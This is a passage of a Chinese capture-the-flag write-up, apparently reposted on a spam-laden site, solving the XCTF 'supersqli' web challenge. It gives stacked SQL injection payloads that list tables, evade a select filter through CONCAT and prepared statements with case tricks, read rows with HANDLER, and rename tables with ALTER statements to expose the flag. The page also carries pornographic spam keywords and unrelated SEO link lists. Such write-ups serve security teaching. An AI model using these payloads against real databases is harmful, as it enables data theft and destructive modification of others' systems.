中文亚洲精品无码_熟女乱子伦免费_人人超碰人人爱国产_亚洲熟妇女综合网

當(dāng)前位置: 首頁 > news >正文

互聯(lián)網(wǎng)網(wǎng)站基礎(chǔ)中國最大網(wǎng)站排名

互聯(lián)網(wǎng)網(wǎng)站基礎(chǔ),中國最大網(wǎng)站排名,貴州省遵義市人民政府網(wǎng)站,centos7做網(wǎng)站XCTF_Web_高手進(jìn)階區(qū) supersqli supersqli 這里使用谷歌瀏覽器 拿到題目后,發(fā)現(xiàn)是單引號報錯字符型注入 用order by語句判斷出兩個字段:order by 2的時候頁面正?;仫@,order by 3的時候頁面出錯。 使用union select聯(lián)合查詢,發(fā)現(xiàn)…

XCTF_Web_高手進(jìn)階區(qū)

  • supersqli

supersqli

這里使用谷歌瀏覽器
拿到題目后,發(fā)現(xiàn)是單引號報錯字符型注入
在這里插入圖片描述
用order by語句判斷出兩個字段:order by 2的時候頁面正常回顯,order by 3的時候頁面出錯。
使用union select聯(lián)合查詢,發(fā)現(xiàn)關(guān)鍵字select被正則過濾了
在這里插入圖片描述
因此,需要繞過select的過濾
解法一:
(1)堆疊注入/?inject=-1’;show tables --+
在這里插入圖片描述
(2)發(fā)現(xiàn)了兩張表,分別查詢兩張表中的字段,
/?inject=-1’;show columns from 1919810931114514 --+
在這里插入圖片描述
/?inject=-1’;show columns from words --+
在這里插入圖片描述
(3)發(fā)現(xiàn)了flag在第一個表中,接下來就是要查看flag的內(nèi)容了。但是select被過濾了,這里可以采用預(yù)編譯的方式繞過。

?inject=-1';set @sql = CONCAT('sele','ct * from \`1919810931114514\`;');prepare aaa from @sql;EXECUTE aaa;#

在這里插入圖片描述
(4)這里用strstr函數(shù)過濾了’set’和’prepare’關(guān)鍵詞,利用strstr不能區(qū)分大小寫,將其改為大寫即可

/?inject=-1';sEt @sql = CONCAT('sele','ct * from \`1919810931114514\`;');prepArE aaa from @sql;EXECUTE aaa;#

或者

/?inject=-1';sEt @sql = CONCAT('se','lect * from \`1919810931114514\`;');prEpare stmt from @sql;EXECUTE stmt;#

或者

/?inject=-1';use supersqli;set @sql=concat('s','elect * from \`1919810931114514\`');PREPARE pre FROM @sql;EXECUTE pre;--+

在這里插入圖片描述
解法二:
handler查詢
在查找到有兩張表的前提下進(jìn)行
(1)使用方法:
handler table_name open打開一張表
handel table_name read first讀取第一行內(nèi)容,
handel table_name read next依次獲取其它行

/?inject=-1';handler `1919810931114514` open;handler `1919810931114514` read first;#

在這里插入圖片描述
解法三:
(1)修改表名和列名,在查找到兩個表后,看一下第二個表
在這里插入圖片描述
(2)其中有一個列就是data列,是可以進(jìn)行查詢的。所以這里將表1919810931114514名字改為words,flag列名字改為id,就可以查詢flag的內(nèi)容了。

1'; alter table words rename to aaaa;alter table `1919810931114514` rename to words;alter table words change flag id varchar(100);#

其中:
alter table words rename to aaaa;先把原來的words表名字改成別的,這個隨便
alter table`1919810931114514` rename to words;將表1919810931114514的名字改為words
alter table words change flag id varchar(100);將改完名字后的表中的flag改為id,字符串盡量長點(diǎn)
(3)然后用1’ or 1=1 --+直接就能得到正確結(jié)果
在這里插入圖片描述

http://www.risenshineclean.com/news/2967.html

相關(guān)文章:

  • wordpress adsense主題游戲優(yōu)化大師下載安裝
  • 山東網(wǎng)站建設(shè)優(yōu)化技術(shù)太原做網(wǎng)站的工作室
  • 如何用frontpage做網(wǎng)站seo快速優(yōu)化文章排名
  • 信息分類網(wǎng)站好建嗎百度輿情
  • 南京網(wǎng)站建設(shè)王道下拉強(qiáng)獨(dú)立站seo
  • 建設(shè)銀行網(wǎng)站的支付流程太原整站優(yōu)化排名外包
  • 一個網(wǎng)站的頁頭大概做多大有沒有免費(fèi)的廣告平臺
  • 曰本做爰視頻網(wǎng)站開發(fā)新客戶的十大渠道
  • 用樹莓派做網(wǎng)站服務(wù)器太原推廣團(tuán)隊
  • 龍巖政府網(wǎng)seo教程自學(xué)
  • 做網(wǎng)站需要哪些費(fèi)用支出瀏覽器網(wǎng)頁版入口
  • jsp網(wǎng)站開發(fā)四庫全書網(wǎng)絡(luò)營銷什么意思
  • 網(wǎng)站后臺圖片傳不上去怎么辦汕頭seo外包機(jī)構(gòu)
  • 如何用iis部署網(wǎng)站網(wǎng)站頁面設(shè)計模板
  • 山東網(wǎng)站建設(shè)最便宜如何讓百度能查到自己
  • 點(diǎn)擊一個網(wǎng)站跳轉(zhuǎn)到圖片怎么做的淘寶關(guān)鍵詞排名查詢工具免費(fèi)
  • 網(wǎng)站建設(shè)公司普遍存在劣勢數(shù)據(jù)分析師資格證書怎么考
  • 北京上地做網(wǎng)站seo西安
  • 個人簡歷制作網(wǎng)站營銷網(wǎng)站做的好的公司
  • 一個網(wǎng)站做無限關(guān)鍵詞網(wǎng)站seo優(yōu)化怎么做
  • 湖南建設(shè)廳官方網(wǎng)站官網(wǎng)seo排名關(guān)鍵詞
  • 湛江專業(yè)做網(wǎng)站seo優(yōu)化系統(tǒng)
  • 寧波市城鄉(xiāng)建設(shè)委員會網(wǎng)站填寫電話的廣告
  • wordpress數(shù)據(jù)庫鏈接地址seo綜合查詢平臺官網(wǎng)
  • 廊坊專業(yè)做網(wǎng)站十大免費(fèi)cms建站系統(tǒng)介紹
  • 網(wǎng)站出現(xiàn)風(fēng)險如何處理方法營銷培訓(xùn)課程ppt
  • 用帝國軟件做網(wǎng)站的心得uc瀏覽器網(wǎng)頁版入口
  • 做一個公司的網(wǎng)站應(yīng)做哪些準(zhǔn)備工作內(nèi)容百度上免費(fèi)創(chuàng)建網(wǎng)站
  • 龍崗?fù)瑯飞鐓^(qū)做網(wǎng)站網(wǎng)絡(luò)工程師培訓(xùn)一般多少錢
  • 如何做網(wǎng)站監(jiān)控關(guān)鍵詞優(yōu)化是什么工作